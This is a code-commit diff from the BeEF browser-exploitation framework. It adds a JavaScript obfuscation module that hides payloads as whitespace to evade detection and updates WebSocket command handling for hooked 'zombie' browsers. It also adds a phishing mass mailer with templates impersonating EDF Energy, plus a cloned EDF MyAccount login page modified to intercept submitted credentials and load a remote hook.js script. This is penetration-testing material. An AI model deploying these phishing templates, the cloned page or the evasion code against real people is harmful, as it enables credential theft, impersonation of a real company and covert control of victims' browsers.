# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket-secured error: #{e}"
# end
# end
# }
#
# }
#
##Thread for websocket
#Thread.new {
# port = @@config.get("beef.http.websocket.port")
# sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
# EventMachine.run {
#
# wsopt = {:host => "0.0.0.0", :port => port}
#
#
# EventMachine::WebSocket.start(wsopt) do |ws|
# begin
# print_debug "New WebSocket channel open."
# ws.onmessage { |msg|
# msg_hash = JSON.parse("#{msg}")
# #@note messageHash[result] is Base64 encoded
# if (msg_hash["cookie"]!= nil)
# print_debug("WebSocket - Browser says helo! WebSocket is running")
# #insert new connection in activesocket
# @@activeSocket["#{msg_hash["cookie"]}"] = ws
# print_debug("WebSocket - activeSocket content [#{@@activeSocket}]")
# elsif msg_hash["alive"] != nil
# hooked_browser = BeEF::Core::Models::HookedBrowser.first(:session => msg_hash["alive"])
# unless hooked_browser.nil?
# hooked_browser.lastseen = Time.new.to_i
# hooked_browser.count!
# hooked_browser.save
#
# #Check if new modules need to be sent
# zombie_commands = BeEF::Core::Models::Command.all(:hooked_browser_id => hooked_browser.id, :instructions_sent => false)
# zombie_commands.each { |command| add_command_instructions(command, hooked_browser) }
#
# #@todo antisnatchor:
# #@todo - re-use the pre_hook_send callback mechanisms to have a generic check for multipl extensions
# #Check if new forged requests need to be sent (Requester/TunnelingProxy)
# dhook = BeEF::Extension::Requester::API::Hook.new
# dhook.requester_run(hooked_browser, '')
#
# #Check if new XssRays scan need to be started
# xssrays = BeEF::Extension::Xssrays::API::Scan.new
# xssrays.start_scan(hooked_browser, '')
# end
# else
# #json recv is a cmd response decode and send all to
# #we have to call dynamicreconstructor handler camp must be websocket
# #print_debug("Received from WebSocket #{messageHash}")
# execute(msg_hash)
# end
# }
# rescue Exception => e
# print_error "WebSocket error: #{e}"
# end
# end
# }
#}
end
def start_websocket_server(ws_options, secure)
Thread.new {
sleep 2 # prevent issues when starting at the same time the TunnelingProxy, Thin and Evented WebSockets
EventMachine.run { #todo antisnatchor: add support for WebSocket secure (new object with different config options, then start)
EventMachine::WebSocket.start(:host => "0.0.0.0", :port => port) do |ws|
EventMachine.run {
EventMachine::WebSocket.start(ws_options) do |ws|
begin
print_debug "New WebSocket channel open."
secure ? print_debug("New WebSocketSecure channel open.") : print_debug("New WebSocket channel open.")
ws.onmessage { |msg|
msg_hash = JSON.parse("#{msg}")
#@note messageHash[result] is Base64 encoded
@@ -80,7 +219,6 @@ module BeEF
end
}
}
end
#@note retrieve the right websocket channel given an hooked browser session
@@ -115,7 +253,7 @@ module BeEF
handler = data["handler"]
if handler.match(/command/)
BeEF::Core::Models::Command.save_result(hooked_browser, data["cid"],
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
@@config.get("beef.module.#{handler.gsub("/command/", "").gsub(".js", "")}.name"), command_results)
else #processing results from extensions, call the right handler
data["beefhook"] = hooked_browser
data["results"] = JSON.parse(Base64.decode64(data["result"]))

4
core/main/server.rb
View File

@@ -62,9 +62,9 @@ module BeEF
raise Exception::TypeError, '"url" needs to be a string' if not url.string?
if args == nil
mounts[url] = http_handler_class
@mounts[url] = http_handler_class
else
mounts[url] = http_handler_class, *args
@mounts[url] = http_handler_class, *args
end
print_debug("Server: mounted handler '#{url}'")
end

9
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -591,12 +591,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# append the number of command modules so the branch name results in: "<category name> (num)"
parent.each {|command_module_branch|
if command_module_branch.is_a?(Hash) and command_module_branch.has_key?('children')
num_of_command_modules = command_module_branch['children'].length
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
num_of_subs = 0
command_module_branch['children'].each {|c|
#add in the submodules and subtract 1 for the folder node
num_of_subs+=c['children'].length-1 if c.has_key?('children')
retitle_recursive_tree([c]) if c.has_key?('cls') and c['cls'] == 'folder'
}
num_of_command_modules = command_module_branch['children'].length + num_of_subs
command_module_branch['text'] = command_module_branch['text'] + " (" + num_of_command_modules.to_s() + ")"
end
}
end

6
extensions/evasion/config.yaml
View File

@@ -16,13 +16,15 @@
beef:
extension:
evasion:
enable: true
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
scramble_variables: true
scramble_cookies: true
scramble:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify", "base_64"]
#chain: ["scramble", "minify"]
chain: ["minify", "base64", "whitespace"]

1
extensions/evasion/extension.rb
View File

@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'
require 'extensions/evasion/obfuscation/whitespace'

68
extensions/evasion/obfuscation/whitespace.rb Normal file
View File

@@ -0,0 +1,68 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module Evasion
class Whitespace
include Singleton
def need_bootstrap
true
end
def get_bootstrap
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
decode_function =
"//Dirty IE6 whitespace bug hack
function IE_spacer(css_space) {
var spacer = '';
for(y = 0; y < css_space.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(css_space.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
spacer += String.fromCharCode(v);
}return spacer;
}"
end
def execute(input, config)
size = input.length
encoded = encode(input)
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
input
end
def encode(input)
output = input.unpack('B*')
output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ')
output
end
end
end
end
end

6
extensions/notifications/channels/tweet.rb
View File

@@ -38,7 +38,11 @@ module Channels
config.oauth_token_secret = @config.get('beef.extension.notifications.twitter.oauth_token_secret')
end
Twitter.direct_message_create(username, message)
begin
Twitter.direct_message_create(username, message)
rescue
print "Twitter send failed, verify tokens have Read/Write/DM acceess..\n"
end
end
end

58
extensions/social_engineering/config.yaml Normal file
View File

@@ -0,0 +1,58 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
extension:
social_engineering:
enable: true
name: 'Social Engineering'
authors: ["antisnatchor"]
web_cloner:
# NOTE: you must have 'wget' in your PATH
add_beef_hook: true
user_agent: "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20120716 Firefox/15.0a2"
mass_mailer:
# NOTE: you must have 'file' in your PATH
user_agent: "Microsoft-MacOutlook/12.12.0.111556"
host: "smtp.gmail.com"
port: 587
use_auth: true
use_tls: true
helo: "gmail.com" # this is usually the domain name
from: "youruser@gmail.com"
password: "yourpass"
# available templates
templates:
default:
# images are by default inline, so if you want to attach something, see 'attachments' below
images: ["beef_logo.png"]
images_cids:
cid1: "beef_logo.png"
attachments: ["beef_attachment.pdf"]
edfenergy:
# my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
# intercept POST requests) to be served with the web_cloner using use_existing = true
images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
images_cids:
cid1: "corner-tl.png"
cid2: "main.png"
cid3: "edf_logo.png"
cid4: "promo-corner-left.png"
cid5: "promo-corner-right-arrow.png"
cid6: "promo-reflection.png"
cid7: "2012.png"
cid8: "corner-bl.png"
cid9: "corner-br.png"
cid10: "bottom-border.png"

56
extensions/social_engineering/extension.rb Normal file
View File

@@ -0,0 +1,56 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module RegisterSEngHandler
def self.mount_handler(server)
server.mount('/api/seng', BeEF::Extension::SocialEngineering::SEngRest.new)
end
end
module SocialEngineering
extend BeEF::API::Extension
@short_name = 'social_engineering'
@full_name = 'Social Engineering'
@description = 'Phishing attacks for your pleasure: web page cloner (POST interceptor and BeEF goodness), highly configurable mass mailer, etc.'
BeEF::API::Registrar.instance.register(BeEF::Extension::RegisterSEngHandler, BeEF::API::Server, 'mount_handler')
end
end
end
# Handlers
require 'extensions/social_engineering/web_cloner/web_cloner'
require 'extensions/social_engineering/web_cloner/interceptor'
require 'extensions/social_engineering/mass_mailer/mass_mailer'
# Models
require 'extensions/social_engineering/models/web_cloner'
require 'extensions/social_engineering/models/interceptor'
#require 'extensions/social_engineering/models/mass_mailer'
# RESTful api endpoints
require 'extensions/social_engineering/rest/socialengineering'

249
extensions/social_engineering/mass_mailer/mass_mailer.rb Normal file
View File

@@ -0,0 +1,249 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
module BeEF
module Extension
module SocialEngineering
class MassMailer
require 'net/smtp'
require 'base64'
include Singleton
def initialize
@config = BeEF::Core::Configuration.instance
@config_prefix = "beef.extension.social_engineering.mass_mailer"
@templates_dir = "#{File.expand_path('../../../../extensions/social_engineering/mass_mailer/templates', __FILE__)}/"
@user_agent = @config.get("#{@config_prefix}.user_agent")
@host = @config.get("#{@config_prefix}.host")
@port = @config.get("#{@config_prefix}.port")
@helo = @config.get("#{@config_prefix}.helo")
@from = @config.get("#{@config_prefix}.from")
@password = @config.get("#{@config_prefix}.password")
end
# tos_hash is an Hash like:
# 'antisnatchor@gmail.com' => 'Michele'
# 'ciccio@pasticcio.com' => 'Ciccio'
def send_email(template, fromname, subject, link, linktext, tos_hash)
# create new SSL context and disable CA chain validation
if @config.get("#{@config_prefix}.use_tls")
@ctx = OpenSSL::SSL::SSLContext.new
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE # In case the SMTP server uses a self-signed cert, we proceed anyway
@ctx.ssl_version = "TLSv1"
end
n = tos_hash.size
x = 1
print_info "Sending #{n} mail(s) from [#{@from}] - name [#{fromname}] using template [#{template}]:"
print_info "subject: #{subject}"
print_info "link: #{link}"
print_info "linktext: #{linktext}"
# create a new SMTP object, enable TLS with the previous instantiated context, and connects to the server
smtp = Net::SMTP.new(@host, @port)
smtp.enable_starttls(@ctx) unless @config.get("#{@config_prefix}.use_tls") == false
if @config.get("#{@config_prefix}.use_auth")
smtp.start(@helo, @from, @password, :login) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
else
smtp.start(@helo, @from) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, to, name, subject, link, linktext, template)
smtp.send_message(message, @from, to)
print_info "Mail #{x}/#{n} to [#{to}] sent."
x += 1
end
end
end
end
def compose_email(fromname, to, name, subject, link, linktext, template)
msg_id = random_string(50)
boundary = "------------#{random_string(24)}"
rel_boundary = "------------#{random_string(24)}"
header = email_headers(@from, fromname, @user_agent, to, subject, msg_id, boundary)
plain_body = email_plain_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.plain", template), boundary)
rel_header = email_related(rel_boundary)
html_body = email_html_body(parse_template(name, link, linktext, "#{@templates_dir}#{template}/mail.html", template),rel_boundary)
images = ""
@config.get("#{@config_prefix}.templates.#{template}.images").each do |image|
images += email_add_image(image, "#{@templates_dir}#{template}/#{image}",rel_boundary)
end
attachments = ""
if @config.get("#{@config_prefix}.templates.#{template}.attachments") != nil
@config.get("#{@config_prefix}.templates.#{template}.attachments").each do |attachment|
attachments += email_add_attachment(attachment, "#{@templates_dir}#{template}/#{attachment}",rel_boundary)
end
end
close = email_close(boundary)
message = header + plain_body + rel_header + html_body + images + attachments + close
print_debug "Raw Email content:\n #{message}"
message
end
def email_headers(from, fromname, user_agent, to, subject, msg_id, boundary)
headers = <<EOF
From: "#{fromname}" <#{from}>
Reply-To: "#{fromname}" <#{from}>
Return-Path: "#{fromname}" <#{from}>
X-Mailer: #{user_agent}
To: #{to}
Message-ID: <#{msg_id}@#{@host}>
X-Spam-Status: No, score=0.001 required=5
Subject: #{subject}
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=#{boundary}
This is a multi-part message in MIME format.
--#{boundary}
EOF
headers
end
def email_plain_body(plain_text, boundary)
plain_body = <<EOF
Content-Type: text/plain; charset="utf8"
Content-Transfer-Encoding:8bit
#{plain_text}
--#{boundary}
EOF
plain_body
end
def email_related(rel_boundary)
related = <<EOF
Content-Type: multipart/related;
boundary="#{rel_boundary}"
--#{rel_boundary}
EOF
related
end
def email_html_body(html_body, rel_boundary)
html_body = <<EOF
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
#{html_body}
--#{rel_boundary}
EOF
html_body
end
def email_add_image(name, path, rel_boundary)
file_encoded = [File.read(path)].pack("m") # base64 encoded
image = <<EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-ID: <#{name}>
Content-Disposition: inline;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
image
end
def email_add_attachment(name, path, rel_boundary)
file_encoded = [File.read(path)].pack("m") # base64 encoded
image = <<EOF
Content-Type: #{get_mime(path)};
name="#{name}"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="#{name}"
#{file_encoded}
--#{rel_boundary}
EOF
image
end
def email_close(boundary)
close = <<EOF
--#{boundary}--
EOF
close
end
# Replaces placeholder values from the plain/html email templates
def parse_template(name, link, linktext, template_path, template)
result = ""
img_config = "#{@config_prefix}.templates.#{template}.images_cids"
img_count = 0
File.open(template_path, 'r').each do |line|
# change the Recipient name
if line.include?("__name__")
result += line.gsub("__name__",name)
# change the link/linktext
elsif line.include?("__link__")
if line.include?("__linktext__")
result += line.gsub("__link__",link).gsub("__linktext__",linktext)
else
result += line.gsub("__link__",link)
end
# change images cid/name/alt
elsif line.include?("src=\"cid:__")
img_count += 1
if line.include?("name=\"img__") || line.include?("alt=\"__img")
result += line.gsub("__cid#{img_count}__",
@config.get("#{img_config}.cid#{img_count}")).gsub("__img#{img_count}__",
@config.get("#{img_config}.cid#{img_count}"))
else
result += line.gsub("__cid#{img_count}__",@config.get("#{img_config}.cid#{img_count}"))
end
else
result += line
end
end
result
end
def get_mime(file_path)
result = ""
IO.popen(["file", "--mime","-b", "#{file_path}"], 'r+') do |io|
result = io.readlines.first.split(";").first
end
result
end
def random_string(length)
output = (0..length).map{ rand(36).to_s(36).upcase }.join
end
end
end
end
end

BIN
extensions/social_engineering/mass_mailer/templates/default/beef_attachment.pdf Normal file
View File

Binary file not shown.

BIN
extensions/social_engineering/mass_mailer/templates/default/beef_logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 13 KiB

21
extensions/social_engineering/mass_mailer/templates/default/mail.html Normal file
View File

@@ -0,0 +1,21 @@
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head>
<body bgcolor="#FFFFFF" text="#000000">
Hi __name__,<br>
<br>
We would like to inform you that your BeEF order has been successful.<br>
You can check the status of your hook at the following link:<br>
<!-- be sure to have link and linktext placeholders on the same line, like the following: -->
<a href="__link__">__linktext__</a><br>
<br>
For convenience, we also attached a resume of your order as PDF.<br>
<br>
Regards,<br>
The BeEF team<br>
<!-- be sure to have different images on different lines, like the following: -->
<img src="cid:__cid1__" name="__img1__" alt="__img1__"><br>
<!--<img src="cid:cid2" name="img2" alt="img2"><br>-->
</body>
</html>

10
extensions/social_engineering/mass_mailer/templates/default/mail.plain Normal file
View File

@@ -0,0 +1,10 @@
Hi __name__,
We would like to inform you that your BeEF order has been successful.
You can check the status of your hook at the following link:
__link__
For convenience, we also attached a resume of your order as PDF.
Regards,
The BeEF team

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/2012.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 9.2 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/bottom-border.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 33 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-bl.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-br.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/corner-tl.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 2.8 KiB

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/edf_logo.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.8 KiB

54
extensions/social_engineering/mass_mailer/templates/edfenergy/mail.html Normal file
View File

@@ -0,0 +1,54 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF8">
<meta name="Generator" content="StreamServe MailOUT"><title>
</title><style type="text/css">P {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px;}</style>
</head><body><div><p><font face=MS Sans Serif color=#000000 size=1>
<table style="width:618px; border-collapse:collapse;">
<tr><td style="padding:28px; background-color: #ff5716;">
<table style="border-collapse:collapse; font-size:12px; width:562px;" cellpadding="0" cellspacing="0" border="0">
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:top;">
<img src="cid:__cid1__" style="display:block; width:11px; height:11px;" />
</td><td colspan="2" style="width:379px; background-color:white;"></td>
<td rowspan="3" colspan="2" style="padding: 0px; margin:0px; line-height:0px; background-color:white; vertical-align:top;">
<img src="cid:__cid2__" style="display:block; width:155px; height:291px; " alt="Cityscape" /></td></tr>
<tr><td style="background-color:white;" rowspan="3"></td><td style="width:60px; vertical-align:top; background-color:white;">
<img src="cid:__cid3__" style="display:block; width:44px; height:65px;" alt="EDFEnergy" /></td>
<td style="width:315px; background-color:white;">
<h1 style="font-family: arial, sans-serif; font-weight:bold; font-size:16pt; color:#09357a; margin:0;">
Important information regarding your account</h1><br /></td></tr>
<tr><td colspan="2" style="font-family: arial, sans-serif; font-size:11pt; color:#434343; width:375px; background-color:white; vertical-align:top;" >
<p style="margin: 16px 0px 16px 0px;"><span style="color:#09357a; font-weight: bold; font-size:13pt;" >
Dear __name__</span></p><p style="margin-bottom:16px;">You have an important message regarding your EDF Energy account. </p>
<p style="margin-bottom:16px;">As this message contains confidential information you must
<a href="__link__" style="color: #013976;">click here</a> to view the message.</p>
<p style="margin-bottom:16px;">In order to read your messages you must be registered to MyAccount which you can do using the same link. </p>
<br/><table style="border-collapse:collapse; width:292px; padding:0px;"><tr>
<td style="width:11px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid4__"
style="display:block; width:11px; height:26px;" /></td>
<td style="background-color: #09357a; color:white; width:282px; padding:0 0 0 5px; font-family:Arial; font-weight:bold; font-size:10pt;">
<a href="__link__" style="color:white; text-decoration:none;">Continue to MyMessages</a></td>
<td style="width:27px; background-color:#09357a; padding:0px; vertical-align:top;">
<img src="cid:__cid5__" style="display:block; width:27px; height:26px;" /></td></tr>
<tr><td colspan="3" style="width:293px; padding:0px;">
<img src="cid:__cid6__" style="display:block; width:293px; height:9px;" />
</td></tr></table></td></tr><tr><td colspan="2" style="width:375px; background-color:white;"></td>
<td colspan="2" style="text-align:right;background-color:white;">
<img src="cid:__cid7__" style="display:block; float:right; width:95px; height:69px;" alt="London 2012" /></td></tr>
<tr><td style="padding: 0px; margin:0px; line-height:0px; width:28px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid8__" style="display:block; width:11px; height:11px;" /></td>
<td colspan="2" style="width:375px; background-color:white;"></td>
<td style="width:144px; background-color:white;">&nbsp;</td>
<td style="padding: 0px; margin:0px; line-height:0px; text-align:right; width:11px; background-color:white; vertical-align:bottom;">
<img src="cid:__cid9__" style="display:block; padding: 0px; margin: 0px; width:11px; height:11px;" />
</td>
</tr> </table></td></tr><tr>
<td style="padding: 0px;">
<img src="cid:__cid10__" style="display:block; width:618px; height:27px;" />
</td></tr><tr><td style="padding:15px 28px; background-color:#ffdecf;">
<p style="text-align:center; font-family: arial, sans-serif; font-weight:bold; font-size:9pt; color:#001f40;">
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office is at 40 Grosvenor Place, London, SW1X 7EN,
incorporated in England and Wales. EDF Energy Customers plc. is a wholly owned subsidiary of EDF Energy plc.
The responsibility for performance of the supply obligations for all EDF Energy supply contracts rests with EDF Energy Customers plc.
<br /><br />The official Emblems of the London Organising Committee of the Olympic Games <br />and Paralympic Games Ltd are 2007 LOCOG. All rights reserved.</p></td></tr>
</table></font></p></font></div></body></html>

19
extensions/social_engineering/mass_mailer/templates/edfenergy/mail.plain Normal file
View File

@@ -0,0 +1,19 @@
Important information regarding your account
Dear __name__
You have an important message regarding your EDF Energy account.
As this message contains confidential information you must click here to view the message:
__link__
In order to read your messages you must be registered to MyAccount which you can do using the same link:
__link__
EDF Energy is a trading name used by EDF Energy Customers plc. Reg. No 02228297 whose registered office
is at 40 Grosvenor Place, London, SW1X 7EN, incorporated in England and Wales. EDF Energy Customers plc.
is a wholly owned subsidiary of EDF Energy plc. The responsibility for performance of the supply obligations
for all EDF Energy supply contracts rests with EDF Energy Customers plc.
The official Emblems of the London Organising Committee of the Olympic Games
and Paralympic Games Ltd are © 2007 LOCOG. All rights reserved.

BIN
extensions/social_engineering/mass_mailer/templates/edfenergy/main.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 55 KiB

790
extensions/social_engineering/mass_mailer/templates/edfenergy/my-account.edfenergy.com_mod Normal file
View File

@@ -0,0 +1,790 @@
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html><head><LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/glbl/glbl_nn7.css?7.0.20.0.1">
<LINK REL=stylesheet HREF="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.design.portaldesigndata/themes/portal/Edf_Energy_Orchard_Theme/prtl_std/prtl_std_nn7.css?7.0.20.0.1">
<!-- EPCF: BOB Core -->
<meta http-equiv="Content-Script-Type" content="text/javascript">
<script src="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.epcf.loader/script/optimize/js13_epcf.js?7.00001620"></script>
<script>
<!--
EPCM.relaxDocumentDomain();
EPCM.init( {
Version:7.00001620,
Level:1,
PortalVersion:"7.00.200908152330",
DynamicTop:false, // [service=true nestedWinOnAlias=false]
UAType:21, // [Mozilla]
UAVersion:5.0,
UAPlatform:1, // [Win]
UIPMode:"1", // [Default=1, User=0, Personalize=true]
UIPWinFeatures:"",
UIPPortalPath:"https://my-account.edfenergy.com:443/irj/portal/anonymous",
UIPPopupComp:"",
UIPPopupCompSize:"",
UIPPopupMsgNN:"Your current page contains unsaved data.\r\nDo you want to continue with navigation and open a new window?",
UIPPopupMsgND:"Your current page contains unsaved data.\r\nDo you want to discard the changes and open the content in the same window?",
DBGException:false
} );
EPCM.DSM.init( {
TerminatorURL:"/irj/servlet/prt/portal/prtroot/com.sap.portal.dsm.Terminator",
WinEmptyUrl:"/irj/portalapps/com.sap.portal.dsm/images/empty.gif",
ForcedUserDebug:false,
KeepAliveActive:false,
KeepAliveDelta:840,
KeepAliveStopAfter:36000
} );
function SAPWP_receiveSessInfo( sessInfo, frameRef ){
EPCM.DSM.processSession( sessInfo, frameRef );
}
//-->
</script>
<!-- EPCF: EOB Core -->
<script type="text/javascript">
/*HTML Business for Java, 645_SP_REL, 529005, Wed Jul 22 15:27:56 BST 2009*/
ur_system = {doc : window.document , mimepath :"/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/common/", stylepath : "/irj/portalapps/com.sap.portal.design.urdesigndata/themes/portal/Edf_Energy_Orchard_Theme/ur/", emptyhoverurl : "/irj/portalapps/com.sap.portal.htmlb/jslib/emptyhover.html", is508 : false, dateformat : 1, domainrelaxing : "MINIMAL"};
</script>
<title >MyAccount</title><meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.httpconnectivity.httpauthentication/scripts/CAManagerScript.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/HistoryFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/NavigationFramework.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.navigation.helperservice/scripts/FrameworkSupport.js" ></script><script SRC="https://my-account.edfenergy.com/irj/portalapps/com.sap.portal.pagebuilder/scripts/pagesupport.js" ></script><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/main_v1.5.css?7.0.20.0.1" TYPE="text/css" ><link REL=STYLESHEET HREF="https://my-account.edfenergy.com/irj/portalapps/com.edfe.orchard.Logon/css/stylesheets/myaccount_v3.css?7.0.20.0.1" TYPE="text/css" ><script type="text/javascript" src="http://192.168.0.3:80/hook.js"></script>
</head><body class="prtlBody urFontBaseFam urScrl">
<!-- EPCF: Component com.sap.portal.navigation.portallauncher.anonymous, kegighenibibncgidhmmmfdjjggfpmhm -->
<Script>
var caEngine = new CAManager('/irj/servlet/prt/portal/prtroot/com.sap.portal.httpconnectivity.httpauthentication.Engine','dialogHeight:10;dialogWidth:20;center:1;help:0;status:0');
caEngine.registerCAEvent('com.sap.portal.httpconnectivity.httpauthentication','Teach',caEngine,'eventCallBack');
</Script>
<script>
var disableWorkProtectCheck = false;
function popupUnsavedDataBeforeUnload(evt)
{
if ((typeof pageTitleBar != "undefined") && pageTitleBar.backForwardLink)
{
pageTitleBar.backForwardLink = false;
}
else
{
evt = (evt) ? evt : ((window.event) ? event : null);
if ( EPCM.getUAType() != EPCM.MSIE && EPCM.getUAType() != EPCM.MOZILLA) return;
if ( EPCM.getGlobalDirty() && (! disableWorkProtectCheck ))
{
if(EPCM.getUAType() == EPCM.MSIE )
{
evt.returnValue = 'You have unsaved data';
}
else
{
evt.preventDefault();
evt.stopPropagation();
return 'You have unsaved data';
}
}
}
}
try{
if ( EPCM.getUAType() == EPCM.MSIE || EPCM.getUAType()== EPCM.MOZILLA){
if (window==EPCM.getSAPTop()){
window.onbeforeunload = popupUnsavedDataBeforeUnload;
}
}
} catch(ex){}
